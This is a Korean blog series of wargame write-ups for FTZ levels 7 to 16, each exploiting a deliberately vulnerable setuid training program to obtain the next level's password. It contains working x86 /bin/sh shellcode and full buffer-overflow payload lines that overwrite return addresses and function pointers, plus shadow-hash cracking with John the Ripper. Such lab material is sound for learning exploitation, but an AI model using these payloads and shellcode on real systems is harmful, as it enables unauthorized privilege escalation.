FTZ level16 풀이
FTZ level16 풀이
level16의 홈디렉토리에 level17의 권한으로 setuid가 걸린 attackme 프로그램 존재
hint 파일을 열어보자
hint 파일에는 c소스 파일이 있었다. 해석해보자
코드 해석을 참조하면 level17의 권한으로 셸을 실행하는 함수 shell 함수와 단순 출력을 하는 printit 함수를 선언하고 call 포인터에 printit 함수를 저장하고 main()의 마지막부분에서 호출한다. 그렇다면 printit을 가르키고 있는 call의 주소 값을 shell 함수 주소로 변조하면 어떻게 될까?
문제를 해결하기 위한 방법을 생각해보자.
1 : buf[20] 에서 부터 *call 까지의 거리
2 : shell 함수의 주소 가져오기
3 : *call위치에 shell 함수 주소를 덮어 씌우는 페이로드 제작
우선 buf[20] 에서부터 *call 까지의 거리를 확인해보자
디버깅을 위해 attackme 파일을 tmp/로 복사
0x08048530 <main+24>: lea eax,[ebp-56] 해당 부분을 확인해보면 buf에서부터 ebp의 거리를 확인할 수 있다.
buf[20]에서 부터 ebp 까지의 거리 = 56
0x0804853c <main+36>: mov eax,DWORD PTR [ebp-16] 해당 부분을 확인해보면 call 에서부터 ebp의 거리를 확인 할 수 있다.
call 에서부터 ebp 까지의 거리 = 16
buf[20] 에서부터 call 까지의 거리 = (buf[20]에서부터 ebp까지의 거리) - (call 에서부터 ebp 까지의 거리) = 56 - 16 = 40
이제 p 명령어로 shell 함수가 위치해 있는 주소를 확인해보자
shell 함수가 위치한 주소 = 0x80484d0
이제 본격적으로 페이로드를 작성해보자
기본적으로 페이로드는 [buf~call 거리] + [shell 함수 주소] 이런식으로 작성할 것이다.
최종적인 페이로드는 (python -c 'print "\x90"*40+"\xd9\x84\x04\x08:';cat) | ./attackme
성공적으로 call 포인터가 shell 함수주소를 불러오게 변조되어 셸이 실행됬다. my-pass 명령어로 level 17의 패스워드 출력
level16 clear ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level18 풀이 (0) | 2017.07.04 |
|---|---|
| FTZ level17 풀이 (0) | 2017.07.04 |
| FTZ level15 풀이 (0) | 2017.07.04 |
| FTZ level14 풀이 (0) | 2017.07.04 |
| FTZ level13 풀이 (0) | 2017.07.04 |
FTZ level15 풀이
FTZ level15 풀이
level15 홈디렉토리의 내용이다. level16의 권한으로 setuid가 걸린 attackme 프로그램 존재
hint 파일을 열어보자
hint 파일에 c언어 소스코드가 있었다.
소스코드를 해석해보자
14번 문제와 동일한 코드에서 check 변수를 포인터로 변경했다. 포인터 변수는 메모리의 주소 값을 저장하는 변수이다.
그렇다면 check에 들어가는 값은 메모리의 주소 값으로 저장되며, check 포인터 변수에 있는 값이 가리키는 메모리 주소에
0xdeadbeef를 넣어줘야 문제가 풀릴 것이다.
어떤식으로 문제를 해결할지 생각해보자
1 : buf[20]에서 부터 *check 까지의 거리
2 : 디버깅을 통해 0xdeadbeef 주소 알아오기
3 : *check 포인터 변수에 존재하는 메모리 주소에 0xdeadbeef 덮어 씌우는 페이로드 작성
우선 buf[20]에서 부터 *check 까지의 거리를 구해보자
디버깅을 위해 attackme 파일을 /tmp 폴더로 복사
0x080484a1 <main+17>: lea eax,[ebp-56] 해당 부분으로 buf에서 ebp까지의 거리를 구할 수 있다.
buf[20] 에서부터 ebp 까지의 거리 = 56
0x080484ad <main+29>: cmp DWORD PTR [ebp-16],0xdeadbeef 해당 부분은 조건문에서 *check 포인터와 0xdeadbeef 값을 비교하는 부분이다.
*check 에서부터 ebp 까지의 거리 = 16
buf[20]에서 *check까지의 거리 = (buf에서 ebp까지의 거리) - (*check에서부터 ebp까지의 거리) = 56 - 16 = 40
이제 메모리 상에서 0xdeadbeef가 존재하는 위치를 알아보자
0x080484b0 <main+32>: cmp DWORD PTR [eax],0xdeadbeef 해당 부분은 0xdeadbeef 와 *check를 비교하는 부분이다.
이 부분은 x/10x 0x080484b0 명령어로 해당 주소로부터 10바이트까지의 주소를 출력시켜서 확인 후 찾아보자
0xdeadbeef 값이 존재하는 주소가 0x80484b2 라는것을 알았다.
이제 본격적으로 페이로드를 작성해보자.
페이로드는 [buf[20]에서부터 *check 까지의 거리] + [check(0xdeadbeef)주소] 이런식으로 작성할 것이다.
최종적으로 페이로드는 (python -c 'print "\x90"*40+"\xb2\x84\x04\x08"';cat) | ./attackme
성공적으로 *check 포인터 변수에 저장된 주소를 0xdeadbeef 주소로 덮어 씌웠고 /bin/sh 쉘이 실행되었다. 그리고 my-pass
명령어로 level16의 패스워드를 출력시켰다.
level15 clear ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level17 풀이 (0) | 2017.07.04 |
|---|---|
| FTZ level16 풀이 (0) | 2017.07.04 |
| FTZ level14 풀이 (0) | 2017.07.04 |
| FTZ level13 풀이 (0) | 2017.07.04 |
| FTZ level12 풀이 (1) | 2017.07.04 |
FTZ level14 풀이
FTZ level14 풀이
level14의 홈디렉토리 내용이다 . level15의 setuid가 걸린 attackme 파일 존재
hint 파일을 출력해보자.
이번 힌트에서는 c언어 소스코드에 더불어서 버퍼 오버플로우 포맷스트링 버그 학습에 효과적인 문제라는 친절한 설명도 적혀있다.
이제 코드를 해석해보자
소스 코드 해석을 참조하면 fgets 함수로 45바이트 만큼의 입력만 받는다. 아마 ret 변조를 통한 공략을 불가능하게 해둔 모양이다.
어떤식으로 문제를 해결 할 것인지 생각해보자
1 : buf[20]에서부터 check까지의 거리
2 : chack 위치에 0xdeadbeef를 덮어씌우는 페이로드 제작
우선 buf[20] 에서부터 check까지의 거리를 구해보자.
디버깅을 위해 attackme 프로그램을 tmp/ 폴더로 복사하자
0x080484a1 <main+17>: lea eax,[ebp-56] 해당 부분으로 buf에서 ebp까지의 거리를 구할 수 있다.
buf[20] 에서부터 ebp 까지의 거리 = 56
0x080484ad <main+29>: cmp DWORD PTR [ebp-16],0xdeadbeef 해당 부분은 조건문에서 check 변수와 0xdeadbeef 값을 비교하는 부분이다.
check 에서부터 ebp 까지의 거리 = 16
buf[20]에서 check까지의 거리 = (buf에서 ebp까지의 거리) - (check에서부터 ebp까지의 거리) = 56 - 16 = 40
이제 본격적으로 페이로드를 작성해보자
페이로드는 [buf~check거리] + [변조할값] 이런식으로 작성 할 것이다.
최종적으로 페이로드는 (python -c 'print "\x90"*40+"\xef\xbe\xad\xde"';cat) | ./attackme
페이로드가 성공적으로 들어갔고 /bin/sh 쉘이 실행됬다. my-pass 명령어로 level15 패스워드 출력
level14 clear ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level16 풀이 (0) | 2017.07.04 |
|---|---|
| FTZ level15 풀이 (0) | 2017.07.04 |
| FTZ level13 풀이 (0) | 2017.07.04 |
| FTZ level12 풀이 (1) | 2017.07.04 |
| FTZ level11 풀이 (0) | 2017.07.04 |
FTZ level13 풀이
FTZ level13 풀이
level13 의 홈디렉토리 내용이다. 이번에도 attack me 프로그램이 존재한다.
attackme 프로그램에는 level14의 권한으로 setuid가 걸려 있다.
hint 파일을 확인해보자
hint 파일에 c 소스코드가 들어있다. 해석해보자
코드 해석 내용을 참조하면 i 변수를 이용해 버퍼 오버 플로우 공격 여부를 검사하는 것 같다. 그래서 페이로드 작성시 중간에 변수 i 부분을 다시 0x1234567 값으로 변조하는 페이로드를 작성해야 할 것 같다.
어떤 식으로 문제를 해결할지 생각해보자
1 : buf[1024]~ 변수 i 까지의 거리, 변수 i ~ ret 까지의 거리
2 : 환경 변수에 쉘코드를 등록하고 주소 확인
3 : ret위치의 데이터를 쉘코드 주소로 변조시키는 페이로드 작성
먼저 buf[1024] ~ 변수 i 까지의 거리와 변수 i~ ret 까지의 거리를 알아보자
디버깅을 위해 attackme 파일을 tmp/ 디렉터리로 이동
0x080484d6 <main+54>: lea eax,[ebp-1048] 해당 부분을 확인하면 buf 에서 ebp 까지의 거리를 구할 수 있다.
buf 에서 ebp 까지의 거리 = 1048
buf 에서 ret 까지의 거리 = 1052(1048+4Byte)
0x080484e5 <main+69>: cmp DWORD PTR [ebp-12],0x1234567 해당 부분은 if문에서 변수 i 와 0x1234567를 비교하는 부분이다.
i 에서 ebp 까지의 거리 = 12
i 에서 ret 까지의 거리 = 16
최종적으로 buf 에서 i 까지의 거리는 (buf에서 ret까지의 거리) - (i에서 ret 까지의 거리) = 1052 - 16 = 1036
i변수의 끝에서 ret 까지의 거리 = (i에서 ret까지의 거리) - i의 크기(long형은 4Byte) = 16 - 4 =12
이제 쉘코드 주소를 환경 변수에 등록하자
<SHELL CODE>
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
그리고 쉘코드의 주소를 알아오기 위해 간단한 c소스코드를 작성후 실행해 주소를 얻도록 하자
쉘 코드의 주소 = 0xbffffef6
본격적으로 페이로드를 작성해보자.
페이로드는 [buf에서 i까지의 거리] + [i값] + [i변수의 끝에서 ret까지의 거리] + [쉘코드 주소] 이런식으로 작성 할 것이다.
최종적으로 페이로드는 ./attackme `python -c 'print "\x90"*1036+"\x67\x45\x23\x01"+"\x90"*12+"\xf6\xfe\xff\xbf"'`
페이로드를 실행하면 성공적으로 쉘을 획득하게 되고 my-pass 명령어로 level14 패스워드 출력!
level13 claer ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level15 풀이 (0) | 2017.07.04 |
|---|---|
| FTZ level14 풀이 (0) | 2017.07.04 |
| FTZ level12 풀이 (1) | 2017.07.04 |
| FTZ level11 풀이 (0) | 2017.07.04 |
| FTZ level10 풀이 (0) | 2017.06.30 |
FTZ level12 풀이
FTZ level12 풀이
level12의 홈디렉터리 내용이다. 이번 문제도 역시 attackme 프로그램을 이용하는 문제인것 같다.
attacme 프로그램에 level13의 권한으로 setuid가 걸려있다.
hint파일을 열어보자
역시나 hint 파일에는 c 언어 소스코드가 있었다.
해석해보자!
소스코드 해석을 참조하면 실행시 사용자 입력을 받지 않고 프로그램 실행중에 gets() 함수를 통해 사용자 입력을 받는다.
어떤 식으로 이문제를 해결할 것인지 생각해 보자.
1 : str[256]의 시작점에서 main() ret 까지의 거리를 구한다
2 : 환경변수에 쉘 코드를 등록하고 주소를 확인한다.
3 : ret 위치의 데이터를 쉘 코드 주소로 변조시킬 페이로드를 작성한다.
4 : 페이로드를 이용해 셸 획득
먼저 str[256]의 시작점에서 main() ret 까지의 거리를 구해보자
디버깅을 위해 attackme 파일을 tmp 디렉토리로 복사하자
0x080484a1 <main+49>: lea eax,[ebp-264]
: 이 부분을 통해 str 버퍼에서 ebp 까지의 거리가 264 라는 것을 알 수 있다.
그리고 ret은 ebp로부터 4Byte 아래에 위치 하므로 268이다
str[256] 시작점에서 부터 main() ret 까지의 거리 : 268
이제 쉘코드의 주소를 알아보자
<shell code>
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
이번 문제에서는 쉘 코드를 환경변수에 등록하고 이 환경변수의 메모리 주소를 ret의 값으로 변조하여 쉘을 실행시킬것이다. 그러기 위해서 쉘 코드를 환경 변수에 등록하는 방법을 알아보자.
우선 환경변수는 OS가 필요한 정보를 메모리에 등록해 놓고 필요할때 마다 참조하는 영역을 의미한다. 일반 사용자 역시 환경변수에 등록해서 사용이 가능.
환경변수에 등록된 데이터는 고정적인 메모리주소를 가지고 있게 된다. 그래서 우리가 필요한 쉘코드를 환경 변수에 등록하고 이 환경 변수의 메모리 주소를 알아 올 수 있다면 우리는 ret의 값을 환경변수에 등록한 쉘코드로 변조가 가능하게 되는 것이다.
export [환경 변수명]=[사용자 입력]
이런 식으로 원하는 동작을 사용자 임의로 등록 할 수 있다. 이때 우리는 사용자 입력에 쉘코드를 넣을 것이다.
유의할 점은 쉘코드 내용이 실제로 경로를 포함하고 있어서 환경변수를 등록 할 때 경로임을 표시해주는 "$"를 앞에 붙여줘야 한다.
그리고 쉘 코드를 (python -c 'print "쉘코드"') 와 함께 전달해야 메모리에서 끌어와 구동시킬 수 있다.
최종적으로 export shellcode=$(python -c 'print "\x90"*20+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"') 이런식으로 환경변수에 쉘코드를 등록하면 된다.
이제 환경변수에 등록된 쉘코드의 주소를 알아보기 위해 간단한 c언어 코드를 만들고 실행시켜보자
해당 코드는 getenv 함수를 사용해 위에서 등록한 shellcode 환경변수 값을 불러온다.
컴파일후 실행시키면 쉘 코드의 주소가 나온다
쉘코드의 주소 =0xbffffef6
이제 페이로드를 작성해보자
페이로드는 (python -c 'print "\x90"*[str ~ ret거리]"+[쉘코드의 주소]';cat) | ./attackme 이런식으로 작성할 것이다.
최종적인 페이로드 : (python -c 'print "\x90"*268 + "\xf6\xfe\xff\xbf"';cat) | ./attackme
페이로드를 실행시키니 성공적으로 쉘을 획득했다. 그리고 my-pass 명령어를 이용해 level13의 패스워드를 출력
level12 clear ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level14 풀이 (0) | 2017.07.04 |
|---|---|
| FTZ level13 풀이 (0) | 2017.07.04 |
| FTZ level11 풀이 (0) | 2017.07.04 |
| FTZ level10 풀이 (0) | 2017.06.30 |
| FTZ level9 풀이 (0) | 2017.06.30 |
FTZ level11 풀이
FTZ level11 풀이
level 11의 홈디렉터리 내용이다. level12 권한으로 setuid가 걸린 attackme 라는 파일이 눈에 띈다.
hint 파일을 출력해보자
hint 파일을 cat으로 열어보면 c 소스코드가 출력된다. 해석해보도록 하자
strcpy 함수는 NULL 문자 전까지의 문자열을 복사하는 함수이다. strcpy 함수에는 취약점이 존재하는데 바로 문자열의 길이를 검사
하지 않기 때문에 버퍼의 크기보다 더 큰 문자열이 들어갈 경우 오버 플로우가 발생한다는 것이다.
그리고 입력 받는 문자의 크기가 str 배열의 크기인 256을 넘었을때에 관련된 처리가 없다.
이것은 곧 입력 문자열을 조절해서 RET 값 변조가 가능하다는 것을 의미한다.
attackme 프로그램에 level12의 권한으로 setuid가 설정되어 있다. 이 프로그램이 실행되는 동안에 my-pass 나 /bin/bash 같은
명령어를 실행시킨다면 level12의 패스워드를 획득 할 수 있을것이다. /binbash 를 메모리 상에서 실행시키기 위해서는
shell code를 사용해야 한다.
shell code는 /bin/bash, /bin/sh 와 같은 셸을 실행시켜주는 코드이다. 이코드는 보통 c 언어로 이루어져있고 이것을 기계어로 변환시켜 최종적으로 결과물을 16진수의 코드로 만든것이다.
<Shell Code>
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80
우리는 공격을 시도하기 전에 공격에 사용할 argv[1]의 주소와 str 버퍼에서 ret 시작점 까지의 거리를 알아야한다.
그러기 위해서는 attackme 프로그램을 디버깅 해야한다. /tmp 디렉터리로 복사 하자.
우선 argv[1]의 주소를 알아보자
gdb 명령어로 디버깅을 시작했다. 그리고 b *main 명령어로 프로그램 시작과 동시에 브레이크 포인트를 잡아줬다.
r `python -c 'print "A" *256'` 로 argv[1]에 A를 채워주자.
0x41 hex값이 보이는데 이것은 A의 ascii 코드 값이다.
argv[1]의 시작주소 = bffffb2c + 9 = bffffb36
버퍼에서 RET까지의 거리는 EBP - str[256]의 주소 + 4(ebp에서 ret까지의 거리) 이런식으로 구하면된다.
그러기 위해 우선 EBP의 값을 알아보도록 하자
main+1 부분이 ESP의 값을 EBP에 복사하는 부분이다. 쉽게 말해 현재 함수의 EBP가 결정되는 부분.
main+3 부분에 브레이크 포인트를 걸어서 EBP의 값을 확인해보도록 하자
b *main+3 명령어로 브레이크 포인트를 잡은 뒤, r 'python -c 'print "A"*256'` 명령어로 프로그램 시작과 동시에 python을 통해 A를 256번 입력해서 실행한다. 그리고 info reg 명령어로 EBP의 값을 확인하면된다.
EBP = 0xbffff9e8
이제 str[256] 의 버퍼 시작 주소를 알아보자.
strcpy(main+48부분) 함수가 실행완료된 시점(main+53)에 브레이크 포인트를 추가했다. (str에 값이 들어가는 지점이기 때문)
c 로 main+3에서 새로운 브레이크 포인트인 main+53까지 실행시켰다
/90x $esp 명령을 사용하면 esp가 지금 가르키고 있는 위치의 메모리부터 90Byte 까지의 메모리를 확인 할 수 있다.
A의 ascii 코드값인 0x41이 시작되는 부분인 0xbffff8e0 이 str[256]의 주소
str[256]의 주소 = 0xbffff8e0
이제 버퍼에서 ret 까지의 거리를 계산해보도록 하자
0xbffff9e8 - 0xbffff8e0 + 4 = 108 +4 = 0x10c(16진수) = 268(10진수)
str 버퍼에서 ret 까지의 거리 = 268 Byte
이제 본격적으로 페이로드를 작성해보자 .
./attackme `python -c 'print "[쉘코드]"+"A"*[숫자]+"[argv[1]주소]"'`
우선 숫자부분에 들어갈 수를 계산해보자.
268(str버퍼에서 ret까지의 거리) - 41(쉘코드 길이)
숫자=227
그리고 나머지 부분을 채워 넣으면 페이로드가 완성된다.
./attackme `python -c 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"+"A"*227+"\x36\xfb\xff\xbf"'`
위 페이로드를 실행하니 쉘이 실행되었고 my-pass 명령어를 통해 level12의 패스워드를 출력시켰다.
level11 clear ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level13 풀이 (0) | 2017.07.04 |
|---|---|
| FTZ level12 풀이 (1) | 2017.07.04 |
| FTZ level10 풀이 (0) | 2017.06.30 |
| FTZ level9 풀이 (0) | 2017.06.30 |
| FTZ level8 풀이 (0) | 2017.06.30 |
FTZ level10 풀이
FTZ level10 풀이
level10 홈 디렉터리의 파일내용이다. 이번에는 program 이라는 폴더가 추가된 것을 확인 할 수 있다.
우선 hint를 확인해보자
힌트를 보면 공유 메모리를 사용해 만든 프로그램을 도청하는 것이 이번 문제의 목표인 것 같다.
TIP. 공유 메모리
- 공유 메모리는 여러 프로세스에서 동시에 접근할 수 있는 메모리이다. 문제내용에 나와있는 key_t 라는 값은 공유 메모리를 구별하는 식 별 번호이다.
level10 홈디렉토리에 존재하는 program 디렉터리로 이동하려고 시도 해보았더니 권한이 없어 거부당했다.
아마 저 디렉토리에 공유 메모리를 사용해 만든 프로그램이 존재하는 것 같다.
공유 메모리를 위해 사용하는 대표적인 함수로는 shmget(공유 메모리를 요청하는 함수), shmat(공유 메모리를 사용가능하게 만듬) 정도가 있다. 이 두 함수를 이용하여 key_t 값이 7530인 공유 메모리를 도청하는 코드를 작성하고 실행시켜보면 어떻게 될까?
key_t가 7530인 공유 메모리에 접근해 해당 공유 메모리를 사용하여 도청하는 코드이다. 컴파일 시킨 후 실행시켜보도록 하자
코드를 실행하면 공유메모리의 내용을 도청하여 위와 같이 구타가 level11의 패스워드를 출력 시켜준다.
level 10 clear ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level12 풀이 (1) | 2017.07.04 |
|---|---|
| FTZ level11 풀이 (0) | 2017.07.04 |
| FTZ level9 풀이 (0) | 2017.06.30 |
| FTZ level8 풀이 (0) | 2017.06.30 |
| FTZ level7 풀이 (0) | 2017.06.30 |
FTZ level9 풀이
FTZ level9 풀이
level9의 홈디렉토리의 파일내용은 이렇다.
hint의 파일내용을 확인해보자
hint 파일내용에는 c언어 소스코드가 있다.
소스코드를 해석해보자.
소스코드를 보면 buf2 배열의 값에 go 문자열이 있으면 level10의 권한으로 /bin/bash 셸이 실행된다. 하지만 buf2 변수는 우리가 임의로 값을 입력할 수 없다. 그렇다면 어떻게 buf2 변수에 go문자열을 넣을수 있을까?
현재 이 소스코드에는 문제점이 있다. 바로 buf 변수의 크기는 10바이트로 할당했는데 fgets로 buf 변수에 입력받는 값은 40바이트 이다. 이렇게 되면 buf에 10바이트 이상의 값이 입력되면 buf 변수의 버퍼영역이 buf2 변수의 버퍼영역을 침범하게 되어 버퍼 오버 플로우 취약점이 발생한다.
조금 더 쉽게 이해하기 위해 hint 파일의 소스코드를 복사해 컴파일 한후 gdb를 통해 어샘블리어 코드로 접근해보자.
level9gdb 라는 이름으로 컴파일했다.
어샘블리어로 확인해보면 [ebp-40] 에 문자열을 입력받는다. 그리고 [ebp-24] 에서 문자열을 비교한다.
쉽게말해 [ebp-40]은 buf 변수의 위치이며, [ebp-24]는 buf2 변수의 위치가 될 것이다.
그래서 buf와 buf2 사이의 거리는 16바이트이며, 원래 변수에 할당된 10바이트 만큼의 거리 차이가 있어야 하는데 dummy라는 쓰레기 값이 6바이트 만큼 존재해 16바이트 만큼 차이나게 되는 것이다.
buf의 변수에 값을 16바이트 만큼 넣은후 그뒤에 go를 넣게되면 buf의 주소와 쓰레기값을 지나 buf2의 주소를 덮어 씌워 셸이 실행될 것이다.
buf[10] + dummy[6] + buf2[10]
XXXXXXXXXX XXXXXX go
파이썬으로 X를 16번 입력하고 마지막에 go 문자를 연결한뒤 |(파이프)를 이용해 /usr/bin/bof 파일을 cat으로 출력시켰다.
그랬더니 /bin/bash 셸이 실행되었고 my-pass 명령으로 level10의 패스워드가 출력됬다.
level9 clear ~
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level11 풀이 (0) | 2017.07.04 |
|---|---|
| FTZ level10 풀이 (0) | 2017.06.30 |
| FTZ level8 풀이 (0) | 2017.06.30 |
| FTZ level7 풀이 (0) | 2017.06.30 |
| FTZ level6 풀이 (0) | 2017.06.30 |
FTZ level8 풀이
FTZ level8 풀이
level8의 홈디렉토리 내용이다.
힌트파일을 열어보자.
힌트를 참조해보면 level9 의 shadow 파일이 숨겨져 있으며 용량이 2700이라는 것이다.
그렇다면 find 명령어의 -size 옵션으로 용량이 2700인 level9 소유의 파일을 찾으면 될것같다.
#TIP.find 명령어의 -size 옵션
- size 옵션을 사용시에는 용량의 단위를 같이 적어줘야한다.
[단위]
b : [512byte(블록)]
c : [byte]
k : [kbyte]
w : [2byte]
/etc/rc.d/found.txt 파일이 아무래도 문제관련 파일인것 같다. /etc/rc.d 디렉토리로 이동해 확인해보자
found.txt 파일을 출력해보자
found.txt 파일을 출력해본결과 힌트대로 level9의 shadow 파일의 내용이 출력되었다.
TIP./etc/password 파일과 /etc/shadow 파일
- 모든 리눅스 시스템은 단방향 암호화가 된 패스워드를 포함하여 사용자 계정 정보를 보관하는 파일이 /etc/password 이다.
하지만 이 파일은 수정은 불가능 하지만 읽기는 가능하며, 이로인해 크래킹툴을 돌리면 손쉽게 패스워드를 흭득할 수 있다.
이러한 단점을 해결하기 위해 shadow 패스워드가 사용되기 시작했는데, 이 경우 /etc/passwd 파일에 있는 패스워드 부분을
/etc/shaodw 에 별도로 보관하고 이를 root만이 읽을 수 있는 퍼미션으로 설정해두어 보안성이 향상되었다.
#출처: http://blog.naver.com/PostView.nhn?blogId=koromoon&logNo=220611830118
shadow 파일의 구조는 위와 같다.
아무래도 이번문제는 /etc/passwd의 level9 패스워드 부분을 암호화 하여 저장한 shadow 파일의 내용을 크래킹 하는 것이 목표인것 같다.
shadow 파일 크래킹툴을 구글링한 결과 John the Ripper 라는 툴을 찾았다.
John the Ripper 툴 링크 : http://www.openwall.com/john/
윈도우 10 환경에서 john the Ripper 툴을 사용하여 level9의 shadow 파일의 내용을 크래킹 시도를 해볼것이다.
pass.txt 파일을 만들고 내용으로는 level9의 shadow 파일 내용을 적어주었다.
john the ripper 툴을 사용하여 level9의 shadow 파일 내용을 크래킹했더니 패스워드가 출력되었다!
level8 clear!
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level10 풀이 (0) | 2017.06.30 |
|---|---|
| FTZ level9 풀이 (0) | 2017.06.30 |
| FTZ level7 풀이 (0) | 2017.06.30 |
| FTZ level6 풀이 (0) | 2017.06.30 |
| FTZ level5 풀이 (1) | 2017.06.30 |
FTZ level7 풀이
FTZ level7 풀이
level7 홈디렉터리의 내용이다. hint 파일을 열어보자
/bin/level7 파일을 실행하면 패스워드 입력을 요청한다.. 그리고 밑에 있는 4가지의 힌트들 ..
패스워드는 가까운데 있으며 상상력을 총동원하고 2진수를 10진수로 바꾸는 방법을 알아야 하며 공학용 계산기가 필요한 문제라는 것인가?
우선 /bin 디렉토리로 이동해 level7 파일을 확인하자
level8의 소유로 setuid가 걸려있다.
힌트 파일에 있던 내용대로 level7 파일을 실행시키니 password를 입력받는다.
패스워드에 임의의 문자를 넣었더니 패스워드가 틀렸다는 구문과 함께 모스부호? 같은 것이 같이 출력됬다.
처음 힌트 파일에 있던 내용중 2진수를 10진수로 변환시킬수 있냐는 질문을 참조해보면 위에있는 특수문자들은 2진수를 기호화 하여 나타낸것을 의미하는 것 같다. 기호화 시킨 2진수를 알아보기 쉽게 변환해보자
1101101 1100001 1110100 1100101
이런 2진수가 나왔다. 그렇다면 위에 나온 2진수를 공학용 계산기를 이용해 10진수로 변환해보자
공학용 계산기를 사용한 결과 ( 109, 97, 116 ,101 ) 의 10진수가 출력됬다.
하지만 출력된 10진수를 password에 입력해도 패스워드가 틀렸다고 출력된다.
그렇다면 이 10진수를 아스키코드표를 참조하여 문자로 매칭한뒤 그문자를 입력해보면 어떨까?
109 = m
97 = a
116 = t
101 = e
mate 라는 단어가 완성됬다. 이제 password에 입력시켜보자.
mate 라는 단어가 이문제의 패스워드였고 level8의 패스워드가 출력됬다.
level7 clear!
'System Hacking > FTZ' 카테고리의 다른 글
| FTZ level9 풀이 (0) | 2017.06.30 |
|---|---|
| FTZ level8 풀이 (0) | 2017.06.30 |
| FTZ level6 풀이 (0) | 2017.06.30 |
| FTZ level5 풀이 (1) | 2017.06.30 |
| FTZ level4 풀이 (0) | 2017.06.30 |
